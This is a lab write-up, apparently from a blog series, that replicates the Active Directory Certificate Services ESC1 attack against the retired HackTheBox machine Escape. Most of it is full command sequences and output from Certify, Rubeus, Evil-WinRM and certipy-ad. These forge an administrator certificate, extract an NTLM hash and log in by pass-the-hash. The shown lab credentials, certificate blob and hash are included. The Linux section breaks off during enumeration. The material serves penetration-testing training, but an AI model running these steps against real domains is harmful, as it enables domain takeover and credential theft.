In this series I will be replicating Active Directory Certificate Service Attacks in both Windows and Linux environment. Today, we are focusing on ESC1; using a retired machine on HackTheBox (Escape).
The username for initial access is ryan.cooper & password is NuclearMosquito3
Active Directory Certificate Services (ADCS) ESC1
It's a misconfiguration where a certificate template allows a low-privileged user (ryan.cooper) to request a certificate while specifying an arbitrary Subject Alternative Name (SAN). This vulnerability occurs when a template has the ENROLLEE_SUPPLIES_SUBJECT flag enabled and includes an Extended Key Usage (EKU) that permits authentication, such as Client Authentication. By exploiting this, an attacker can request a certificate and manually inject the identity of a high-privileged account (like a Domain Administrator) into the SAN field. Because the Certificate Authority trusts the requester's input, it signs the certificate, granting the attacker a valid cryptographic credential that can be used to impersonate the administrator and gain full control over the domain.
Note: you could also impersonate any other user on the domain using this technique (it doesn't always have to be the administrator).
ESC1 Attack in Windows
In the first phase, we use Certify.exe to scan the Active Directory environment for weak certificate templates. We identified a template named "UserAuthentication" which is vulnerable to ESC1.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> ./Certify.exe enum-templates --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
[X] AuthWithChannelBinding HTTP request for URL 'http://dc.sequel.htb/certsrv/' failed with error: An error occurred while sending the request.
[X] AuthWithChannelBinding HTTP request for URL 'https://dc.sequel.htb/certsrv/' failed with error: An error occurred while sending the request.
[*] Listing info about the enterprise certificate authority 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
User Specifies SAN : Disabled
RPC Request Encryption : Enabled
CA Permissions
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[*] Certificate templates found using the current filter parameters:
Template Name : UserAuthentication
Enabled : True
Publishing CAs : dc.sequel.htb\sequel-DC-CA
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Certificate Name Flag : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required : False
Authorized Signatures Required : 0
Extended Key Usage : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
ESC1 : The template has a client authentication EKU and allows enrollees to supply subject.
<SNIP>Once we confirmed the vulnerability, we requested a certificate from the sequel-DC-CA (Enterprise CA Name — see above) using the compromised template (Template Name is UserAuthentication -see above).
By including the --upn administrator@sequel.htb flag, we instructed the CA to generate a digital identity that claims we are the Domain Administrator. Because of the ESC1 flaw, the CA will successfully issue a certificate to our current user context that actually contains the "Subject Alternative Name" of the administrative account.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Certify.exe request --ca dc.sequel.htb\sequel-DC-CA --template UserAuthentication --upn administrator@sequel.htb
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Subject Alt Name(s) : administrator@sequel.htb
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 13
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBWAwggVcBgsqhkiG9w0BDAoBAaCCBMIwggS+AgEAMA0GCSqGSIb3DQEBAQUABIIEqDCCBKQCAQACggEBALCbEq4wry+j+lW/dQjk0+k/9NJ3XVXTm9e3QO3X3lWMeKiq3T6aUo1e3t1NsTLDvNa/A21KUltHhKROHlf9/8XY6nHXehrLKOQIZ1Mq3nsz4WGQE0YjafPG1+C852epBz7+iXZQAYqP9bcRT7LcKwZN6/sgafAtjeKpQITZHVzi1nWzjttsjRXAvdYaP9Y1g6T1qvJuP6IKDM9MF4Wr1uSBBxansVzDekOudhvC45HRVZM4OQ8b6QcfnZ9jZXBp54I5Dsm9KhitY5h/6SjWbgJPSzjaHw6eCrVnX3RKkxAwF1jrXXOdFASBbvDfW9jjOFKHl2wkYcr3PtTNJzyGpS0CAwEAAQKCAQEAorFZFis3V/YB6fiEgnr7VUdb7H+V9jkIukLRh8pzwe+0P/2X79IO9rlNKiYmdZOoZVR2fboYAIr0AMEOZxVRCRx5bgKJNCGwO9IaDZ3Sc0EqAczOVLDPLIoj2Z9stiwaxseKLvopUVKpk8pY13bIE/i4yhHkRiRRL1uoWjoBOM0f0w8ChaBO4bc1yoXkhKbfJ+RHrKAeKaiFHML2WGBL9oYo7Y08ayy9HioUrUeqrNX/1aUWc37vfzvQo6B7y2ZrbcX/ajiHrAzVSZNuqDKhMb5Z3dmhmUO043WpC4G04hI8GBw5u5PfDwe4XdlHjiPXfF3l4B1QtrOEb2P014DPaQKBgQDP1qfSyGbrLfih8GGjKQzw3RrQrPeDem87c+rb+3k4cDMyL1/YOh2k5HJMuvIavDf09fgJS2W0nkSkwWjo7c7LrwiYxgwUA44/sXAbRm8TUAoskQhwxaBAZTLA+Rz0ubMJ0KcKHG5/IG/f8zdN1JIjQmm3b57mNxlpKNcMc2NZDwKBgQDZh6Ld7yM6JY+/9jEJ7ZH8h2fb+NojxSKWPh0HJnkfyVh+cj2wTwEVBclQxc7cEOIcj1sWEx3zWuzDw8cL2PywoYez+vUD6jVT9a3UD0s8UVcTFlsMwPexMps7Cu1vx+981kcDt96XUirQ4szhJi6K+6frRhwigdPdgybS7tXGAwKBgBn+yizV/fFqZY+zpjKnHsQ9k24IREkAlksEW5q6IFZLykt7m2xLEIwgOp+YPlHTutf7r9NRx93IceN9gWao39WgBd493yLdsvwKcHAo5hmvSCZ82WZpgXqsbaWvQszlMRyIKWxdVAC4iOWk4QTuEn0wgFJ+Noyq1ZXOkt8uBIID6Mt9RwKBgDW254G0BlfaZJe7PDq+XjkkBIIBfFqCF/4NrSUwQmA6nsZ0Eez3NFCFU8zpmwcuGdpNvyGGeeO9HLVdnUsvwA1LoKYtG4X97G9KKzBF7jmhTrF+UHuW7ANJr/C54cwxFS6yVoWNpv/cLDAb359Q+2AqDJqbmS7KywIxhyuA3Fze4zkIbwKBgQCE159u3Fhi1PPJnVWNGDdYrNnYfZ8TSslHYqrpXN2VYJ3wPcQ0ulk0p6v1GFu2Qd89tHAPiFYLXu/umZCElPtHTUS28xbl1+LiDjA8kkP5mB2VIF7s9lozkwdzFeCCIHRfj8AzFgZK7QdnLyBfneStupc390cLicJSEVMMOFU0YzGBhjAjBgkqhkiG9w0BCRUxFgQU4b1QjOn26uyMB4YGEvIWVa1V12owXwYJKoZIhvcNAQkUMVIeUABEAEMAPQBoAHQAYgAsAEQAQwA9AHMAZQBxAHUAZQBsACwAQwBOAD0AVQBzAGUAcgBzACwAQwBOAD0AUgB5AGEAbgAuAEMAbwBvAHAAZQByAAAAAAAAMIAGCSqGSIb3DQEHAaCAJIAEggPoMIIG1zCCBtMGCyqGSIb3DQEMCgEDoIIGOTCCBjUGCiqGSIb3DQEJFgGgggYlBIIGITCCBh0wggUFoAMCAQICEx4AAAANiserExo6v2UAAAAAAA0wDQYJKoZIhvcNAQELBQAwRDETMBEGCgmSJomT8ixkARkWA2h0YjEWMBQGCgmSJomT8ixkARkWBnNlcXVlbDEVMBMGA1UEAxMMc2VxdWVsLURDLUNBMB4XDTI2MDUxMTA4MDUyOFoXDTM2MDUwODA4MDUyOFowUzETMBEGCgmSJomT8ixkARkWA2h0YjEWMBQGCgmSJomT8ixkARkWBnNlcXVlbDEOMAwGA1UEAxMFVXNlcnMxFDASBgNVBAMTC1J5YW4uQ29vcGVyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsJsSrjCvL6P6Vb91COTT6T/00nddVdOb17dA7dfeVYx4qKrdPppSjV7e3U2xMsO81r8DbUpSW0eEpE4eV/3/xdjqcdd6Gsso5AhnUyreezPhYZATRiNp88bX4LznZ6kHPv6JdlABio/1txFPstwrBk3r+yBp8C2N4qlAhNkdXOLWdbOO22yNFcC91ho/1jWDpPWq8m4/ogoMz0wXhavW5IEHFqexXMN6Q652G8LjkdFVkzg5DxvpBx+dn2NlcGnngjkOyb0qGK1jmH/pKNZuAk9LONofDp4KtWdfdEqTEDAXWOtdc50UBIFu8N9b2OM4UoeXbCRhyvcEggPoPtTNJzyGpS0CAwEAAaOCAvcwggLzMB0GA1UdDgQWBBThvVCM6fbq7IwHhgYS8hZVrVXXajAOBgNVHQ8BAf8EBAMCBaAwMwYDVR0RBCwwKqAoBgorBgEEAYI3FAIDoBoMGGFkbWluaXN0cmF0b3JAc2VxdWVsLmh0YjAfBgNVHSMEGDAWgBRinzKjoPA4INRgwM1txfpRMF7DFTCBxAYDVR0fBIG8MIG5MIG2oIGzoIGwhoGtbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049ZGMsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgb0GCCsGAQUFBwEBBIGwMIGtMIGqBggrBgEFBQcwAoaBnWxkYXA6Ly8vQ049c2VxdWVsLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXkEggLzJTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD0GCSsGAQQBgjcVBwQwMC4GJisGAQQBgjcVCIer83aF3KZWh/2VNYO/w1mDico1gXffygiGnuwpAgFlAgEEMCkGA1UdJQQiMCAGCCsGAQUFBwMCBggrBgEFBQcDBAYKKwYBBAGCNwoDBDA1BgkrBgEEAYI3FQoEKDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZIhvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsOAwIHMAoGCCqGSIb3DQMHMA0GCSqGSIb3DQEBCwUAA4IBAQB7q2rWl9LnqIzMXIxw9DxZ4tk0H9an143gBD9grcLz9YiHG8zYmsDrFL/iXVlWuNmHCv8dvKvym2J31Arp9QEWjJggzijogF59q1QTLSzTxPEYzbg20eSSEOS6b4g8GKHXJd2mgLjOlICfIKxq/fCkYINTtYWDefMpTMHN+lr5qBKQbuErB4ISBLrIygX6oLhEDI2RPUt4m1FvG4k7MqqtpnZQej7GMwcpnQMHS9lekYHlTVxbP92G4SYss6CGu+7xOkYBFH05cQSByalarKsw3ul960YOSpVl9X+hxh02KtKe1hZUruBkZA0WVEDZpNdGl520PfgNy/pQcEJ5GxGQk0iHMYGGMCMGCSqGSIb3DQEJFTEWBBThvVCM6fbq7IwHhgYS8hZVrVXXajBfBgkqhkiG9w0BCRQxUh5QAEQAQwA9AGgAdABiACwARABDAD0AcwBlAHEAdQBlAGwALABDAE4APQBVAHMAZQByAHMALABDAE4APQBSAHkAYQBuAC4AQwBvAG8AcABlAHIAAAAAAAAAAAAAAAAAAAAA
Certify completed in 00:00:13.4561300The output from Certify v2.0 is a raw, Base64-encoded PFX blob, which isn't directly usable by the operating system. We use PowerShell to decode that string into raw bytes and write them to a physical file named Admin.pfx. This bridge step is critical because it transforms our text-based evidence of an issued certificate into a cryptographic file that we can feed into Rubeus for the Kerberos exchange.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> $Base64Blob ='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'
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> $Bytes = [System.Convert]::FromBase64String($Base64Blob)
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> [System.IO.File]::WriteAllBytes("$pwd\Admin.pfx", $Bytes)
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:administrator /certificate:Admin.pfx /getcredentials /nowrapNow, with our forged certificate in hand, we used Rubeus.exe to perform PKINIT (Public Key Cryptography for Initial Authentication). By providing the .pfx file, we communicated with the Domain Controller to exchange the certificate for a Ticket Granting Ticket (TGT) for the Administrator account. Because we added the /getcredentials flag, we also forced a "User-to-User" (U2U) exchange to extract the Administrator's NTLM hash directly from the Kerberos response.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> .\Rubeus.exe asktgt /user:administrator /certificate:Admin.pfx /getcredentials /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::d9ec:38a5:d866:984e%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 5/11/2026 1:17:09 AM
EndTime : 5/11/2026 11:17:09 AM
RenewTill : 5/18/2026 1:17:09 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : 4rHEtaRS6ylsisTgpICWGQ==
ASREP (key) : 1C43C51140DD999AB5CF6DDA5EB63748
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EEIn the final stage, we leveraged the extracted NTLM hash to gain remote access to the target. Instead of needing a plaintext password, we used Evil-WinRM to perform a Pass-the-Hash (PtH) attack against the target IP.
┌──(root㉿user)-[/home/user]
└─# evil-winrm -i $target -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administratorESC1 Attack in Linux
We began by using certipy-ad find to enumerate the ADCS environment. By using the -vulnerable and -enable flags, we filtered out non-essential data and specifically targeted templates that are both active and misconfigured. The output explicitly flagged the "UserAuthentication" template for ESC1, noting that it simultaneously allows the enrollee to supply a subject name and supports Client Authentication
┌──(root㉿user)-[/home/…/HTBox/CPTS/HTBox/tools]
└─# certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -dc-ip $target -vulnerable -enable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment
HTTP
